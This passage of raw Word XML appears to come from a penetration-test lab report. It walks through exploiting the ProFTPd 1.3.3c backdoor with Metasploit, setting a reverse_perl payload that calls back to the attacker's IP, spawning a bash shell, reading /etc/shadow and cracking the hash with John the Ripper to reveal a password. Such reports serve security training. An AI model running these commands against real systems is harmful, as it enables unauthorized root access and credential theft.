        <w:t>could be exploited to give me admin access to the device.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AC9FCF" w14:textId="77777777" w:rsidR="004B6D23" w:rsidRDefault="004B6D23" w:rsidP="00562A13">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A8BE9D1" w14:textId="7C6C8D11" w:rsidR="005D4D8F" w:rsidRDefault="00FC621F" w:rsidP="00796B35">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796B35">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Severity</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="009D173F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009D173F">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Low</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563302C9" w14:textId="77777777" w:rsidR="004B6D23" w:rsidRDefault="004B6D23" w:rsidP="00796B35">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F8ACECF" w14:textId="77777777" w:rsidR="004B6D23" w:rsidRDefault="004B6D23" w:rsidP="00796B35">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D411144" w14:textId="77777777" w:rsidR="004B6D23" w:rsidRDefault="004B6D23" w:rsidP="00796B35">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7522D63B" w14:textId="77777777" w:rsidR="004B6D23" w:rsidRDefault="004B6D23" w:rsidP="00796B35">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="099008F7" w14:textId="77777777" w:rsidR="004B6D23" w:rsidRDefault="004B6D23" w:rsidP="00796B35">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BF0B593" w14:textId="77777777" w:rsidR="004B6D23" w:rsidRPr="009D173F" w:rsidRDefault="004B6D23" w:rsidP="00796B35">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A8BE9D3" w14:textId="77777777" w:rsidR="005D4D8F" w:rsidRDefault="005D4D8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="31"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A8BE9D4" w14:textId="65A666A0" w:rsidR="005D4D8F" w:rsidRDefault="00315815">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="891"/>
        </w:tabs>
        <w:ind w:hanging="774"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_bookmark11"/>
      <w:bookmarkEnd w:id="20"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve">FTP Service </w:t>
      </w:r>
      <w:r w:rsidR="00FC621F">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Privilege</w:t>
      </w:r>
      <w:r w:rsidR="00FC621F">
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FC621F">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9A643F" w14:textId="77777777" w:rsidR="001041B3" w:rsidRDefault="001041B3" w:rsidP="001735FB">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="570C9E39" w14:textId="3E2600B5" w:rsidR="001735FB" w:rsidRDefault="00FC621F" w:rsidP="001735FB">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00981BAA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vulnerability Exploited</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="001735FB">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00590794">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>ProFTPd-1.3.3c – Backdoor Command Execution (Metasploit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288D4405" w14:textId="77777777" w:rsidR="00275E2C" w:rsidRDefault="00275E2C" w:rsidP="001735FB">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EB67261" w14:textId="2422DC5A" w:rsidR="00F1400E" w:rsidRDefault="00FC621F" w:rsidP="001735FB">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00981BAA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Vulnerability</w:t>
      </w:r>
      <w:r w:rsidRPr="00981BAA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00981BAA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Explanation:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00981BAA">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve">This exploit allows an attacker to gain administrator access to the FTP </w:t>
      </w:r>
      <w:r w:rsidR="00FE419A">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve">(File Transfer Protocol) </w:t>
      </w:r>
      <w:r w:rsidR="00981BAA">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve">service running on </w:t>
      </w:r>
      <w:r w:rsidR="00AB585A">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve">the vulnerable device. By using the Metasploit Framework </w:t>
      </w:r>
      <w:r w:rsidR="003D0C4C">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00AB585A">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>onsole (</w:t>
      </w:r>
      <w:r w:rsidR="003D0C4C">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve">an application that allows the user to </w:t>
      </w:r>
      <w:r w:rsidR="002620CB">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve">write, test, and run computer exploits), an attacker </w:t>
      </w:r>
      <w:r w:rsidR="006047F0">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>can</w:t>
      </w:r>
      <w:r w:rsidR="00193A28">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> search proftp</w:t>
      </w:r>
      <w:r w:rsidR="002505A3">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> (command: search </w:t>
      </w:r>
      <w:r w:rsidR="00057A80">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="002505A3">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve">proftp”) and </w:t>
      </w:r>
      <w:r w:rsidR="001F69F9">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>receive a list</w:t>
      </w:r>
      <w:r w:rsidR="00C76789">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> of pre-written</w:t>
      </w:r>
      <w:r w:rsidR="001F69F9">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidR="005A4030">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> to exploit</w:t>
      </w:r>
      <w:r w:rsidR="001F69F9">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00057A80">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> You can use the </w:t>
      </w:r>
      <w:r w:rsidR="00057A80" w:rsidRPr="001C0F67">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>proftpd_133c_backdoor</w:t>
      </w:r>
      <w:r w:rsidR="00057A80">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001C0F67">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:r w:rsidR="00057A80">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> to gain root</w:t>
      </w:r>
      <w:r w:rsidR="001C0F67">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> ftp</w:t>
      </w:r>
      <w:r w:rsidR="00057A80">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> access, then from there </w:t>
      </w:r>
      <w:r w:rsidR="001C0F67">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve">spawn a python shell to upgrade from an ftp connection to a fully interactive </w:t>
      </w:r>
      <w:r w:rsidR="0040494A">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>shell connection.</w:t>
      </w:r>
      <w:r w:rsidR="001C0F67">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00185827">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve">We can then </w:t>
      </w:r>
      <w:r w:rsidR="00D319A6">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>find and crack user passwords that are stored on the device.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705DDE1C" w14:textId="77777777" w:rsidR="00F1400E" w:rsidRDefault="00F1400E" w:rsidP="001735FB">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FFEC61E" w14:textId="77777777" w:rsidR="00F1400E" w:rsidRDefault="00F1400E" w:rsidP="001735FB">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>STEP-BY-STEP BREAKDOWN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5410AA" w14:textId="492F71BF" w:rsidR="00F1400E" w:rsidRDefault="0065003A" w:rsidP="00F1400E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 xml:space="preserve">Open your </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED45934" w14:textId="2F6C98DA" w:rsidR="0065003A" w:rsidRDefault="0065003A" w:rsidP="00F1400E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Type “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>” to open the Metasploit framework console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080E0AC7" w14:textId="1993C8EF" w:rsidR="0065003A" w:rsidRDefault="0040494A" w:rsidP="00F1400E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 xml:space="preserve">Once in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>, type “search proftp</w:t>
      </w:r>
      <w:r w:rsidR="00BC15F6">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1905C05E" w14:textId="75EC9C95" w:rsidR="00BC15F6" w:rsidRDefault="00BC15F6" w:rsidP="00F1400E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“Use exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>/ftp/proftp</w:t>
      </w:r>
      <w:r w:rsidR="000D2579">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>d_133c_backdoor”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9F398F" w14:textId="53B97027" w:rsidR="000D2579" w:rsidRDefault="000D2579" w:rsidP="00F1400E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“Show info”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C25118B" w14:textId="7165D940" w:rsidR="000D2579" w:rsidRDefault="000D2579" w:rsidP="00F1400E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 xml:space="preserve">Set RHOSTS </w:t>
      </w:r>
      <w:r w:rsidR="003C7C21">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00681BDE">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>TARGET</w:t>
      </w:r>
      <w:r w:rsidR="003C7C21">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>_IP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376895C0" w14:textId="71EDC500" w:rsidR="003C7C21" w:rsidRDefault="003C7C21" w:rsidP="003C7C21">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>This specifies what device to attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52567305" w14:textId="4BC66388" w:rsidR="003C7C21" w:rsidRDefault="003C7C21" w:rsidP="003C7C21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 xml:space="preserve">Now attach </w:t>
      </w:r>
      <w:r w:rsidR="002275ED">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>a payload to this exploit (this is how the exploit will be delivered to the target device)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377AAFEC" w14:textId="2879FAAC" w:rsidR="002275ED" w:rsidRDefault="002275ED" w:rsidP="002275ED">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Type “show payloads”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2A77FC" w14:textId="143C4CB6" w:rsidR="002275ED" w:rsidRDefault="002275ED" w:rsidP="002275ED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A list of compatible payloads will appear</w:t>
      </w:r>
      <w:r w:rsidR="000C6E55">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve">, you can use almost any, but I used the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000C6E55">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>reverse_perl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000C6E55">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> option by typing “set payload </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004E7358">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004E7358">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004E7358">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004E7358">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004E7358">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>reverse_perl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004E7358">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04886915" w14:textId="1B0CDD36" w:rsidR="004E7358" w:rsidRDefault="004E7358" w:rsidP="002275ED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“</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>show</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> options”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADF81E7" w14:textId="78657160" w:rsidR="004E7358" w:rsidRDefault="004E7358" w:rsidP="002275ED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“Set LHOST</w:t>
      </w:r>
      <w:r w:rsidR="00681BDE">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> [YOUR_DEVICE_IP]”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C01AC77" w14:textId="4E7992FA" w:rsidR="00681BDE" w:rsidRDefault="00681BDE" w:rsidP="00681BDE">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve">This sets which </w:t>
      </w:r>
      <w:r w:rsidR="001765F9">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve">device the backdoor will connect to, make this </w:t>
      </w:r>
      <w:r w:rsidR="001765F9" w:rsidRPr="00D319A6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>your</w:t>
      </w:r>
      <w:r w:rsidR="001765F9">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> devices IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C428F8" w14:textId="050531AF" w:rsidR="001765F9" w:rsidRDefault="001765F9" w:rsidP="001765F9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“exploit”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20005B7B" w14:textId="77777777" w:rsidR="00534DC7" w:rsidRDefault="00534DC7" w:rsidP="00534DC7">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13AFE143" w14:textId="68A36FA8" w:rsidR="001765F9" w:rsidRDefault="006A5439" w:rsidP="001765F9">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>It will take a minute to connect, but once connected</w:t>
      </w:r>
      <w:r w:rsidR="00534DC7">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> you can type “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00534DC7">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00534DC7">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>” to view your root access.</w:t>
      </w:r>
      <w:r w:rsidR="005749AA">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> From here we want to be able to poke around the system more. To do this we will spawn in a python shell that will give us a fully interactive shell session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C238B14" w14:textId="77777777" w:rsidR="00177F82" w:rsidRDefault="00177F82" w:rsidP="001765F9">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="424C6D79" w14:textId="25C85464" w:rsidR="005749AA" w:rsidRDefault="005749AA" w:rsidP="005749AA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Now that we are in</w:t>
      </w:r>
      <w:r w:rsidR="00177F82">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> type “python3 </w:t>
      </w:r>
      <w:r w:rsidR="00BF6993">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve">-c ‘import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00BF6993">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>pty;pty</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00BF6993">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>.spawn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BF6993">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(“/bin/bash”)’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B7CD8C" w14:textId="3254FFA8" w:rsidR="00CB3155" w:rsidRDefault="00CB3155" w:rsidP="005749AA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This will spawn the interactive shell and we can now enter different directories on the system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E78CF0" w14:textId="28C6274E" w:rsidR="00CB3155" w:rsidRDefault="00493839" w:rsidP="005749AA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 xml:space="preserve">We now want to see if there are any </w:t>
      </w:r>
      <w:r w:rsidR="004E5478">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>stored passwords on the system</w:t>
      </w:r>
      <w:r w:rsidR="0083239E">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>. Linux keeps a shadow file that has the hashed (encrypted) passwords of device users. To view this</w:t>
      </w:r>
      <w:r w:rsidR="00A33F5E">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>, type “cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A33F5E">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A33F5E">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>/shadow”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79672FBD" w14:textId="518BF632" w:rsidR="00A33F5E" w:rsidRDefault="00A33F5E" w:rsidP="005749AA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A list appears</w:t>
      </w:r>
      <w:r w:rsidR="003674F1">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> and at the bottom we can see a username with a hashed password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B849BB9" w14:textId="250E43AF" w:rsidR="003674F1" w:rsidRDefault="00F32AEC" w:rsidP="003674F1">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Marlinspike</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72383C51" w14:textId="03224E7B" w:rsidR="00F32AEC" w:rsidRDefault="00F32AEC" w:rsidP="00F32AEC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Copy that entire line and paste it into a text document</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124F336A" w14:textId="1C13466F" w:rsidR="00F32AEC" w:rsidRDefault="00F32AEC" w:rsidP="00F32AEC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Now, open your terminal, navigate to the directory</w:t>
      </w:r>
      <w:r w:rsidR="0013128A">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> the text file is saved in and we are going to use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0013128A">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>J</w:t>
      </w:r>
      <w:r w:rsidR="004251A9">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>ohn</w:t>
      </w:r>
      <w:r w:rsidR="0013128A">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>TheRipper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0013128A">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> to crack the hash and obtain the user password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6906B2D0" w14:textId="1951F891" w:rsidR="004A5319" w:rsidRDefault="004A5319" w:rsidP="00F32AEC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Type j</w:t>
      </w:r>
      <w:r w:rsidR="004251A9">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>ohn [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004251A9">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>your_file_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004251A9">
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9BC080" w14:textId="76985178" w:rsidR="004251A9" w:rsidRDefault="00BB3F12" w:rsidP="00F32AEC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>We are then greeted with the cracked password: marlinspike</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40474A14" w14:textId="77777777" w:rsidR="00BB3F12" w:rsidRDefault="00BB3F12" w:rsidP="00BB3F12">
      <w:pPr>
